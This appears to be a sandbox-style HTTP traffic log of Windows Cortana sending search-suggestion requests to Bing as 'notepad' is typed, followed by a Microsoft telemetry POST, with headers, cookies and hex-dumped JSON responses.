SRCHHPGUSR=SRCHLANG=de&HV=1706260657&IPMH=9aa1009e&IPMID=1696585056799&LUT=1696585056224; domain=.bing.com; expires=Wed, 19-Feb-2025 09:17:39 GMT; path=/; secure; SameSite=None Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.15ed0117.1706260659.4830edb3
2024-01-26 09:17:39 UTC	5806	IN	Data Raw: 7b 22 52 65 73 6f 75 72 63 65 73 22 3a 7b 22 53 74 79 6c 65 73 22 3a 7b 22 43 73 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 43 73 73 48 65 61 64 4f 76 65 72 72 69 64 65 22 3a 7b 7d 7d 2c 22 53 63 72 69 70 74 73 22 3a 7b 22 4a 73 48 65 61 64 54 6f 70 6d 6f 73 74 22 3a 7b 7d 2c 22 4a 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 4a 73 45 6e 64 4f 66 43 68 75 6e 6b 22 3a 7b 7d 2c 22 4a 73 42 65 66 6f 72 65 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 4f 6e 4c 6f 61 64 22 3a 7b 7d 7d 7d 2c 22 53 75 67 67 65 73 74 69 6f 6e 73 22 3a 5b 7b 22 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 75 72 6c 22 3a 22 2f 73 65 61 72 63 68 3f 71 3d 6e 65 74 66 6c 69 78 5c 75 30 30 32 36 66 69 Data Ascii: {"Resources":{"Styles":{"CssHeadNormal":{},"CssHeadOverride":{}},"Scripts":{"JsHeadTopmost":{},"JsHeadNormal":{},"JsEndOfChunk":{},"JsBeforeContent":{},"JsAfterContent":{},"JsAfterOnLoad":{}}},"Suggestions":[{"Attributes":{"url":"/search?q=netflix\u0026fi

Timestamp	Bytes transferred	Direction	Data
2024-01-26 09:17:39 UTC	2386	OUT	GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=no&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=693df9a8be554bffb57e511bdf55aece&ig=29bbb6ccb6ac479f96c95a7308d9ac81 HTTP/1.1 Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: / Accept-Language: en-CH X-Agent-DeviceId: 01000A4109009A83 X-BM-CBT: 1696585056 X-BM-ClientFeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStore X-BM-DateFormat: dd/MM/yyyy X-BM-DeviceDimensions: 784x984 X-BM-DeviceDimensionsLogical: 784x984 X-BM-DeviceScale: 100 X-BM-DTZ: 120 X-BM-Market: CH X-BM-Theme: 000000;0078d7 X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:2C89765 X-Device-ClientSession: 8B0BADD9680C444587B50653454AB647 X-Device-isOptin: false X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A} X-Device-OSSKU: 48 X-Device-Touch: false X-DeviceID: 01000A4109009A83 X-MSEdge-ExternalExp: bfbscope1003t3,bfbwsbpphmemqcf,bfbwsbrs0830cf,d-thshld78,d-thshldspcl40,disfbcthas2_1,fliptrat6,spofglclicksh-c2,wsbqfasmsall_c,wsbref-c X-MSEdge-ExternalExpType: JointCoord X-PositionerType: Desktop X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI X-Search-CortanaAvailableCapabilities: None X-Search-SafeSearch: Moderate X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time X-UserAgeClass: Unknown Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=1F9344FA7B5C6D050D8557587A606C51&CPID=1696585056799&AC=1&CPH=074c06b2&CBV=39996767; _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51; SRCHUID=V=2&GUID=1365D4FE3DA84D19A46408EFC15FC823&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231006; SRCHHPGUSR=SRCHLANG=en&HV=1706260657&IPMH=9aa1009e&IPMID=1696585056799&LUT=1696585056224; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
2024-01-26 09:17:39 UTC	1065	IN	HTTP/1.1 200 OK Content-Length: 9415 Content-Type: application/json; charset=utf-8 Cache-Control: no-cache, no-store, must-revalidate Expires: -1 Pragma: no-cache X-EventID: 65b378b3900b490fac8566c6f2a19189 X-AS-SetSessionMarket: de-ch UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-XSS-Protection: 0 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND" Date: Fri, 26 Jan 2024 09:17:39 GMT Connection: close Set-Cookie: _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51&mkt=de-ch; domain=.bing.com; path=/; HttpOnly Set-Cookie: SRCHHPGUSR=SRCHLANG=de&HV=1706260657&IPMH=9aa1009e&IPMID=1696585056799&LUT=1696585056224; domain=.bing.com; expires=Wed, 19-Feb-2025 09:17:39 GMT; path=/; secure; SameSite=None Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.15ed0117.1706260659.4830ee1a
2024-01-26 09:17:39 UTC	9415	IN	Data Raw: 7b 22 52 65 73 6f 75 72 63 65 73 22 3a 7b 22 53 74 79 6c 65 73 22 3a 7b 22 43 73 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 43 73 73 48 65 61 64 4f 76 65 72 72 69 64 65 22 3a 7b 7d 7d 2c 22 53 63 72 69 70 74 73 22 3a 7b 22 4a 73 48 65 61 64 54 6f 70 6d 6f 73 74 22 3a 7b 7d 2c 22 4a 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 4a 73 45 6e 64 4f 66 43 68 75 6e 6b 22 3a 7b 7d 2c 22 4a 73 42 65 66 6f 72 65 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 4f 6e 4c 6f 61 64 22 3a 7b 7d 7d 7d 2c 22 53 75 67 67 65 73 74 69 6f 6e 73 22 3a 5b 7b 22 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 75 72 6c 22 3a 22 2f 73 65 61 72 63 68 3f 71 3d 6e 6f 74 65 70 61 64 5c 75 30 30 32 36 66 69 Data Ascii: {"Resources":{"Styles":{"CssHeadNormal":{},"CssHeadOverride":{}},"Scripts":{"JsHeadTopmost":{},"JsHeadNormal":{},"JsEndOfChunk":{},"JsBeforeContent":{},"JsAfterContent":{},"JsAfterOnLoad":{}}},"Suggestions":[{"Attributes":{"url":"/search?q=notepad\u0026fi

Timestamp	Bytes transferred	Direction	Data
2024-01-26 09:17:39 UTC	2387	OUT	GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=not&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=693df9a8be554bffb57e511bdf55aece&ig=50d2b87074774724b6850446aacdb75f HTTP/1.1 Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: / Accept-Language: en-CH X-Agent-DeviceId: 01000A4109009A83 X-BM-CBT: 1696585056 X-BM-ClientFeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStore X-BM-DateFormat: dd/MM/yyyy X-BM-DeviceDimensions: 784x984 X-BM-DeviceDimensionsLogical: 784x984 X-BM-DeviceScale: 100 X-BM-DTZ: 120 X-BM-Market: CH X-BM-Theme: 000000;0078d7 X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:2C89765 X-Device-ClientSession: 8B0BADD9680C444587B50653454AB647 X-Device-isOptin: false X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A} X-Device-OSSKU: 48 X-Device-Touch: false X-DeviceID: 01000A4109009A83 X-MSEdge-ExternalExp: bfbscope1003t3,bfbwsbpphmemqcf,bfbwsbrs0830cf,d-thshld78,d-thshldspcl40,disfbcthas2_1,fliptrat6,spofglclicksh-c2,wsbqfasmsall_c,wsbref-c X-MSEdge-ExternalExpType: JointCoord X-PositionerType: Desktop X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI X-Search-CortanaAvailableCapabilities: None X-Search-SafeSearch: Moderate X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time X-UserAgeClass: Unknown Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=1F9344FA7B5C6D050D8557587A606C51&CPID=1696585056799&AC=1&CPH=074c06b2&CBV=39996767; _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51; SRCHUID=V=2&GUID=1365D4FE3DA84D19A46408EFC15FC823&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231006; SRCHHPGUSR=SRCHLANG=en&HV=1706260657&IPMH=9aa1009e&IPMID=1696585056799&LUT=1696585056224; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
2024-01-26 09:17:39 UTC	1065	IN	HTTP/1.1 200 OK Content-Length: 9443 Content-Type: application/json; charset=utf-8 Cache-Control: no-cache, no-store, must-revalidate Expires: -1 Pragma: no-cache X-EventID: 65b378b36c74411fbb34133da4465463 X-AS-SetSessionMarket: de-ch UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-XSS-Protection: 0 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND" Date: Fri, 26 Jan 2024 09:17:39 GMT Connection: close Set-Cookie: _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51&mkt=de-ch; domain=.bing.com; path=/; HttpOnly Set-Cookie: SRCHHPGUSR=SRCHLANG=de&HV=1706260657&IPMH=9aa1009e&IPMID=1696585056799&LUT=1696585056224; domain=.bing.com; expires=Wed, 19-Feb-2025 09:17:39 GMT; path=/; secure; SameSite=None Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.15ed0117.1706260659.4830ee39
2024-01-26 09:17:39 UTC	9443	IN	Data Raw: 7b 22 52 65 73 6f 75 72 63 65 73 22 3a 7b 22 53 74 79 6c 65 73 22 3a 7b 22 43 73 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 43 73 73 48 65 61 64 4f 76 65 72 72 69 64 65 22 3a 7b 7d 7d 2c 22 53 63 72 69 70 74 73 22 3a 7b 22 4a 73 48 65 61 64 54 6f 70 6d 6f 73 74 22 3a 7b 7d 2c 22 4a 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 4a 73 45 6e 64 4f 66 43 68 75 6e 6b 22 3a 7b 7d 2c 22 4a 73 42 65 66 6f 72 65 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 4f 6e 4c 6f 61 64 22 3a 7b 7d 7d 7d 2c 22 53 75 67 67 65 73 74 69 6f 6e 73 22 3a 5b 7b 22 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 75 72 6c 22 3a 22 2f 73 65 61 72 63 68 3f 71 3d 6e 6f 74 65 70 61 64 5c 75 30 30 32 36 66 69 Data Ascii: {"Resources":{"Styles":{"CssHeadNormal":{},"CssHeadOverride":{}},"Scripts":{"JsHeadTopmost":{},"JsHeadNormal":{},"JsEndOfChunk":{},"JsBeforeContent":{},"JsAfterContent":{},"JsAfterOnLoad":{}}},"Suggestions":[{"Attributes":{"url":"/search?q=notepad\u0026fi

Timestamp	Bytes transferred	Direction	Data
2024-01-26 09:17:39 UTC	2388	OUT	GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=note&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=4&cvid=693df9a8be554bffb57e511bdf55aece&ig=c55f8a7eebf549768d9456d6913e67dd HTTP/1.1 Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: / Accept-Language: en-CH X-Agent-DeviceId: 01000A4109009A83 X-BM-CBT: 1696585056 X-BM-ClientFeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStore X-BM-DateFormat: dd/MM/yyyy X-BM-DeviceDimensions: 784x984 X-BM-DeviceDimensionsLogical: 784x984 X-BM-DeviceScale: 100 X-BM-DTZ: 120 X-BM-Market: CH X-BM-Theme: 000000;0078d7 X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:2C89765 X-Device-ClientSession: 8B0BADD9680C444587B50653454AB647 X-Device-isOptin: false X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A} X-Device-OSSKU: 48 X-Device-Touch: false X-DeviceID: 01000A4109009A83 X-MSEdge-ExternalExp: bfbscope1003t3,bfbwsbpphmemqcf,bfbwsbrs0830cf,d-thshld78,d-thshldspcl40,disfbcthas2_1,fliptrat6,spofglclicksh-c2,wsbqfasmsall_c,wsbref-c X-MSEdge-ExternalExpType: JointCoord X-PositionerType: Desktop X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI X-Search-CortanaAvailableCapabilities: None X-Search-SafeSearch: Moderate X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time X-UserAgeClass: Unknown Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=1F9344FA7B5C6D050D8557587A606C51&CPID=1696585056799&AC=1&CPH=074c06b2&CBV=39996767; _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51; SRCHUID=V=2&GUID=1365D4FE3DA84D19A46408EFC15FC823&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231006; SRCHHPGUSR=SRCHLANG=en&HV=1706260657&IPMH=9aa1009e&IPMID=1696585056799&LUT=1696585056224; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
2024-01-26 09:17:39 UTC	1065	IN	HTTP/1.1 200 OK Content-Length: 9679 Content-Type: application/json; charset=utf-8 Cache-Control: no-cache, no-store, must-revalidate Expires: -1 Pragma: no-cache X-EventID: 65b378b376a349ad8e9720dd14fd231e X-AS-SetSessionMarket: de-ch UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-XSS-Protection: 0 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND" Date: Fri, 26 Jan 2024 09:17:39 GMT Connection: close Set-Cookie: _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51&mkt=de-ch; domain=.bing.com; path=/; HttpOnly Set-Cookie: SRCHHPGUSR=SRCHLANG=de&HV=1706260657&IPMH=9aa1009e&IPMID=1696585056799&LUT=1696585056224; domain=.bing.com; expires=Wed, 19-Feb-2025 09:17:39 GMT; path=/; secure; SameSite=None Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.15ed0117.1706260659.4830ee9d
2024-01-26 09:17:39 UTC	9679	IN	Data Raw: 7b 22 52 65 73 6f 75 72 63 65 73 22 3a 7b 22 53 74 79 6c 65 73 22 3a 7b 22 43 73 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 43 73 73 48 65 61 64 4f 76 65 72 72 69 64 65 22 3a 7b 7d 7d 2c 22 53 63 72 69 70 74 73 22 3a 7b 22 4a 73 48 65 61 64 54 6f 70 6d 6f 73 74 22 3a 7b 7d 2c 22 4a 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 4a 73 45 6e 64 4f 66 43 68 75 6e 6b 22 3a 7b 7d 2c 22 4a 73 42 65 66 6f 72 65 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 4f 6e 4c 6f 61 64 22 3a 7b 7d 7d 7d 2c 22 53 75 67 67 65 73 74 69 6f 6e 73 22 3a 5b 7b 22 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 75 72 6c 22 3a 22 2f 73 65 61 72 63 68 3f 71 3d 6e 6f 74 65 70 61 64 5c 75 30 30 32 36 66 69 Data Ascii: {"Resources":{"Styles":{"CssHeadNormal":{},"CssHeadOverride":{}},"Scripts":{"JsHeadTopmost":{},"JsHeadNormal":{},"JsEndOfChunk":{},"JsBeforeContent":{},"JsAfterContent":{},"JsAfterOnLoad":{}}},"Suggestions":[{"Attributes":{"url":"/search?q=notepad\u0026fi

Timestamp	Bytes transferred	Direction	Data
2024-01-26 09:17:39 UTC	2389	OUT	GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=notep&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=5&cvid=693df9a8be554bffb57e511bdf55aece&ig=0590a8c6ac774e3ab659489fe9e8f292 HTTP/1.1 Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: / Accept-Language: en-CH X-Agent-DeviceId: 01000A4109009A83 X-BM-CBT: 1696585056 X-BM-ClientFeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStore X-BM-DateFormat: dd/MM/yyyy X-BM-DeviceDimensions: 784x984 X-BM-DeviceDimensionsLogical: 784x984 X-BM-DeviceScale: 100 X-BM-DTZ: 120 X-BM-Market: CH X-BM-Theme: 000000;0078d7 X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:2C89765 X-Device-ClientSession: 8B0BADD9680C444587B50653454AB647 X-Device-isOptin: false X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A} X-Device-OSSKU: 48 X-Device-Touch: false X-DeviceID: 01000A4109009A83 X-MSEdge-ExternalExp: bfbscope1003t3,bfbwsbpphmemqcf,bfbwsbrs0830cf,d-thshld78,d-thshldspcl40,disfbcthas2_1,fliptrat6,spofglclicksh-c2,wsbqfasmsall_c,wsbref-c X-MSEdge-ExternalExpType: JointCoord X-PositionerType: Desktop X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI X-Search-CortanaAvailableCapabilities: None X-Search-SafeSearch: Moderate X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time X-UserAgeClass: Unknown Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=1F9344FA7B5C6D050D8557587A606C51&CPID=1696585056799&AC=1&CPH=074c06b2&CBV=39996767; _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51; SRCHUID=V=2&GUID=1365D4FE3DA84D19A46408EFC15FC823&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231006; SRCHHPGUSR=SRCHLANG=en&HV=1706260657&IPMH=9aa1009e&IPMID=1696585056799&LUT=1696585056224; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
2024-01-26 09:17:39 UTC	1065	IN	HTTP/1.1 200 OK Content-Length: 9249 Content-Type: application/json; charset=utf-8 Cache-Control: no-cache, no-store, must-revalidate Expires: -1 Pragma: no-cache X-EventID: 65b378b360514a29bdc657cb5eda3b93 X-AS-SetSessionMarket: de-ch UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-XSS-Protection: 0 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND" Date: Fri, 26 Jan 2024 09:17:39 GMT Connection: close Set-Cookie: _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51&mkt=de-ch; domain=.bing.com; path=/; HttpOnly Set-Cookie: SRCHHPGUSR=SRCHLANG=de&HV=1706260657&IPMH=9aa1009e&IPMID=1696585056799&LUT=1696585056224; domain=.bing.com; expires=Wed, 19-Feb-2025 09:17:39 GMT; path=/; secure; SameSite=None Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.15ed0117.1706260659.4830ef76
2024-01-26 09:17:39 UTC	9249	IN	Data Raw: 7b 22 52 65 73 6f 75 72 63 65 73 22 3a 7b 22 53 74 79 6c 65 73 22 3a 7b 22 43 73 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 43 73 73 48 65 61 64 4f 76 65 72 72 69 64 65 22 3a 7b 7d 7d 2c 22 53 63 72 69 70 74 73 22 3a 7b 22 4a 73 48 65 61 64 54 6f 70 6d 6f 73 74 22 3a 7b 7d 2c 22 4a 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 4a 73 45 6e 64 4f 66 43 68 75 6e 6b 22 3a 7b 7d 2c 22 4a 73 42 65 66 6f 72 65 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 4f 6e 4c 6f 61 64 22 3a 7b 7d 7d 7d 2c 22 53 75 67 67 65 73 74 69 6f 6e 73 22 3a 5b 7b 22 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 75 72 6c 22 3a 22 2f 73 65 61 72 63 68 3f 71 3d 6e 6f 74 65 70 61 64 5c 75 30 30 32 36 66 69 Data Ascii: {"Resources":{"Styles":{"CssHeadNormal":{},"CssHeadOverride":{}},"Scripts":{"JsHeadTopmost":{},"JsHeadNormal":{},"JsEndOfChunk":{},"JsBeforeContent":{},"JsAfterContent":{},"JsAfterOnLoad":{}}},"Suggestions":[{"Attributes":{"url":"/search?q=notepad\u0026fi

Timestamp	Bytes transferred	Direction	Data
2024-01-26 09:17:39 UTC	685	OUT	POST /Collector/3.0/?qsp=true&content-type=application%2Fbond-compact-binary&client-id=NO_AUTH&sdk-version=AWT-Web-CJS-1.2.0&x-apikey=33d70a864599496b982a39f036f71122-2064703e-3a9d-4d90-8362-eec08dffe8e8-7176 HTTP/1.1 Origin: https://www.bing.com Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: / Accept-Language: en-CH Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: browser.pipe.aria.microsoft.com Content-Length: 1070 Connection: Keep-Alive Cache-Control: no-cache
2024-01-26 09:17:39 UTC	1070	OUT	Data Raw: 6d 09 0b 01 4a 33 33 64 37 30 61 38 36 34 35 39 39 34 39 36 62 39 38 32 61 33 39 66 30 33 36 66 37 31 31 32 32 2d 32 30 36 34 37 30 33 65 2d 33 61 39 64 2d 34 64 39 30 2d 38 33 36 32 2d 65 65 63 30 38 64 66 66 65 38 65 38 2d 37 31 37 36 0a 01 49 12 61 63 74 5f 64 65 66 61 75 6c 74 5f 73 6f 75 72 63 65 a9 24 35 36 62 35 62 30 62 33 2d 35 65 66 39 2d 34 37 32 36 2d 38 37 30 32 2d 66 31 38 65 31 62 37 39 61 38 34 34 d1 06 86 e6 fb d0 a8 63 cb 08 0a 01 29 24 39 34 31 39 34 63 65 38 2d 34 31 35 61 2d 34 31 35 63 2d 61 34 37 34 2d 65 66 62 33 39 62 62 37 30 34 32 65 71 9e d6 fb d0 a8 63 a9 14 63 75 73 74 6f 6d 2e 43 6c 69 65 6e 74 5f 45 76 65 6e 74 73 c9 06 0e 76 61 72 69 61 6e 74 5f 65 76 65 6e 74 73 cd 0d 09 09 19 0a 64 65 76 69 63 65 54 79 70 65 07 44 45 53 Data Ascii: mJ33d70a864599496b982a39f036f71122-2064703e-3a9d-4d90-8362-eec08dffe8e8-7176Iact_default_source$56b5b0b3-5ef9-4726-8702-f18e1b79a844c)$94194ce8-415a-415c-a474-efb39bb7042eqccustom.Client_Eventsvariant_eventsdeviceTypeDES
2024-01-26 09:17:39 UTC	462	IN	HTTP/1.1 200 OK Content-Length: 0 Content-Type: application/json Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 time-delta-millis: 1207 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST Access-Control-Allow-Headers: Accept, Content-Type, Content-Encoding, Client-Id Access-Control-Expose-Headers: kill-tokens, kill-duration-seconds, time-delta-millis Date: Fri, 26 Jan 2024 09:17:39 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
